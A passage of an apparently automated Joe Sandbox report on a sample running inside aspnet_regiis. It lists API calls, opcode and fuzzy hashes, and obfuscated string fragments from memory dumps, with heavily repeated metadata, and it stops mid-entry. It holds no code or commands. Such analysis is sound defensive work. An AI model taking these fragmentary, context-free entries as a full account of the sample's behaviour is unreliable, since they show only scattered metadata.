• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ComputerName
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3545744682-0
                                                                                                                                                                                                                                                                  • Opcode ID: 267dbe4d930c4baae4fe0b422b23308a87f7c78dcc7ea9d0448a2543512ebd61
                                                                                                                                                                                                                                                                  • Instruction ID: 6c9434aee642e38f6deaeadeb96835e560e178a7f26595bd3e2a66f6de4c07d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 267dbe4d930c4baae4fe0b422b23308a87f7c78dcc7ea9d0448a2543512ebd61
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D011E7B06447918BD716CF29C460722BBE2FF5A204B2CC69DD493CB386CA74E485CB61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000), ref: 72C6E0E0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8db41583be522588e3410d11b90e75a982dfe1f3cf7df30f0c26cfc5f91dc64e
                                                                                                                                                                                                                                                                  • Instruction ID: 37b6856e32771782f99c92cc2df02375eac3b2b9aa8a257dd054b0d4b0436943
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8db41583be522588e3410d11b90e75a982dfe1f3cf7df30f0c26cfc5f91dc64e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F0A732454191EBC3115E3D6D08B573AA4AFE2710F160969E80057114DA35D915D591
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 72C6E3BA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                  • Opcode ID: e1b0e91d63c3de2ba1440b1f067b7394ba96abb6530e3793890084b0e6fcb2a2
                                                                                                                                                                                                                                                                  • Instruction ID: d61e0656fb12ad4ce5086a14caf51980bb25a72f3c29672b30cb98c2bbc6a1d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1b0e91d63c3de2ba1440b1f067b7394ba96abb6530e3793890084b0e6fcb2a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F08CBBE905928FDB04CF66CC5066433A3B7E831232D8A6CD502A3304DA30A906CA51
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BlanketProxy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                  • Opcode ID: b57cf10ee7397a9134ec54706d7336be76dba2a719f023385c887f8ae568c968
                                                                                                                                                                                                                                                                  • Instruction ID: e9c8ff129496eba735be489c83e0ad497f83a5412c4fe26c99c463dccd045145
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b57cf10ee7397a9134ec54706d7336be76dba2a719f023385c887f8ae568c968
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F0DAB4109701CFE344DF29C1A471ABBF0FB88704F10894CE4968B390CB75AA48CF82
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BlanketProxy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                  • Opcode ID: e0dd225c7d37a31ff5132d9dc822ba3066d9b60e1bd813476961b2afc5c494f9
                                                                                                                                                                                                                                                                  • Instruction ID: 95bf6207d5accce3160b057a5a96ddd739e62a91ad91ed8082f786b9a7fed017
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0dd225c7d37a31ff5132d9dc822ba3066d9b60e1bd813476961b2afc5c494f9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF07A755483418FD314DF25C5A871BBBE0BB84308F10891DE5998B390C7B59549CF82
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,72C6E0F9), ref: 72C6C590
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 72C6C561
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: AL$CPm5$O}nl$Yxqs$f>mI$hch&$t|f$uvqs$
• API String ID: 0-1556426300
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: InitializeThunk
• String ID: /$BVLm$_^]\$_^]\$_^]\$_^]\$_^]\
• API String ID: 2994545307-2892575238
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
• API String ID: 0-2666672646
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 72C584BD
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 72C585B4
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: LF7Y$_^]\
• API String ID: 237503144-3688711800
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: aa08c2119de9cb2dd324d9c789ef88a4f55fd28bbf5376a9cbc92cdfc4cae1e9
                                                                                                                                                                                                                                                                  • Instruction ID: 06d2cdf8724a08c409731baa4d6cce01f3ee0dbf0eb1ce22ed41eeaac72471e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa08c2119de9cb2dd324d9c789ef88a4f55fd28bbf5376a9cbc92cdfc4cae1e9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 865152B1E142499FCB40EFADD98569DBBF0BB58310F11852DE898E7350D734A948CF92
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 72C59170
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                  • String ID: M/($M/(
                                                                                                                                                                                                                                                                  • API String ID: 237503144-1710806632
                                                                                                                                                                                                                                                                  • Opcode ID: 5b23df54fede8f0f0d36b046a23281ffea7fe913e2b9538b434d1b25bbbac605
                                                                                                                                                                                                                                                                  • Instruction ID: 9ed0ef88e2417bd10c58bbf2e21eb9b31b59f2e7fc7b7a514474bf888655b0d6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b23df54fede8f0f0d36b046a23281ffea7fe913e2b9538b434d1b25bbbac605
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 582123716583615FE714CE38D882B9FB7AAEBD2700F11892CE0D1DB2C5D675880B8796
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                                  • Opcode ID: 31aeb2f51530570f3897efdc94591b91744f5628f6bf07a889d747a278c5eaee
                                                                                                                                                                                                                                                                  • Instruction ID: 682cecc11d76cb1c1d981094d0d399a8c0e7234b058542fe888d002a5102cc2b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31aeb2f51530570f3897efdc94591b91744f5628f6bf07a889d747a278c5eaee
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60714572B047415FD708DE2DC8D4B3FBBA2EBE9624F298A2DD4979B395D6309901C780
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: N&
                                                                                                                                                                                                                                                                  • API String ID: 0-3274356042
                                                                                                                                                                                                                                                                  • Opcode ID: ddd590e5cf2b373994aee65aeb95e1ae3a502ab3e3598ac9c55f56b91cef4bf7
                                                                                                                                                                                                                                                                  • Instruction ID: a26f26e550687c8f97f70232e13719fbd6ef89558e5ea2fa40d8793d627fe097
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddd590e5cf2b373994aee65aeb95e1ae3a502ab3e3598ac9c55f56b91cef4bf7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E51E721604B804BD72ACA3ECC513B7BBE3ABE7314B58969DC4D7C7686CA3CE0068714
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1225c30d5b12f5f095e44229d0dab9cfbd470f3fad252b00fb9b6ea472225764
                                                                                                                                                                                                                                                                  • Instruction ID: b31a8476859fb551f07b8eb1c201000f2a3e51c308016c5d1c0738506dac7293
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1225c30d5b12f5f095e44229d0dab9cfbd470f3fad252b00fb9b6ea472225764
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E220136B54251CFD708CF79C8E02AAB7A2FB99314F2E8A7DC94697341D7359845CB80
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                                                  Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 297f4b89197acb61c5065d7b64ae3ffd4d1c515c5471772b9ed6b68c66622cb9
• Instruction ID: ff7a38e15b210c97e1fbd391f4b1238bea3a3502e8e2facbcc031cfd15bd256d
• Opcode Fuzzy Hash: 297f4b89197acb61c5065d7b64ae3ffd4d1c515c5471772b9ed6b68c66622cb9
• Instruction Fuzzy Hash: 7C22C332A083118BC326DF1CD9816ABB3F2AFD6319F558E2DD9C697246D734A419CB43
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: edd3fb7b76655d9b08f31fcd75ee3bda2444b7d2db503804ad3f3b640c5d044d
• Instruction ID: 451912b29eebd121552da94345205bed2d5d5415acd74cbaa561b9d4a2d6bafa
• Opcode Fuzzy Hash: edd3fb7b76655d9b08f31fcd75ee3bda2444b7d2db503804ad3f3b640c5d044d
• Instruction Fuzzy Hash: B002F336B54251CFD708CF79C8E02AAB7A2FB99314F2E8A7DC94697341D735A845CB80
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f359283a51ab35cf4d01c669b736217816154f54a8df01bb5849062b5445336
• Instruction ID: 59b52be2eccb30522afe6de5ffb63764b9b61cb35bb87e839d6f892c35af5237
• Opcode Fuzzy Hash: 9f359283a51ab35cf4d01c669b736217816154f54a8df01bb5849062b5445336
• Instruction Fuzzy Hash: 3BF1F336B54251CFD708CF79C8E02AAB7A2FB99315F2E8A7DC94693341D735A845CB80
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9cfd2b797c6307842c4366e8958987f41cedcd780961bb78b5ebd0edf5d955af
• Instruction ID: fd97a8c4d2794501431f8e14e39f8262979a58448a0435d8c93b7672d29dffec
• Opcode Fuzzy Hash: 9cfd2b797c6307842c4366e8958987f41cedcd780961bb78b5ebd0edf5d955af
• Instruction Fuzzy Hash: 19F1F336B54251CFD708CF79C8E02AAB7A2FB99315F2E8A7DC94693341D7359845CB80
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c9edb52b36d0922e16ba6a96c697fb69b1cc82f07aef5d2d82506ec0debb7ed
• Instruction ID: 80775a4d66ff7f3a43e130bcc33ed475b38d156faee2224ec5a9a6bd75074e7e
• Opcode Fuzzy Hash: 6c9edb52b36d0922e16ba6a96c697fb69b1cc82f07aef5d2d82506ec0debb7ed
• Instruction Fuzzy Hash: D1E115B1A00215CFCB14CF6DC8517BBBBB1FF5A310B14565CE892AB395E734A912CB94
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243859325.0000000072C75000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243881494.0000000072C83000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_72c30000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction ID: a26885ec9c31c432b6ebb791d646c1b87659e6555a027d056f248e4f034d47d0
• Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction Fuzzy Hash: 1611E933A051D40ED3128D3D8480575BFF30AE3634B29439DF4B99B2D6D6268D8B8390
Memory Dump Source
• Source File: 00000003.00000002.2243804143.0000000072C31000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C30000, based on PE: true
• Associated: 00000003.00000002.2243786318.0000000072C30000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.2243838411.0000000072C72000.00000002.00000400.00020000.00000000.sdmp
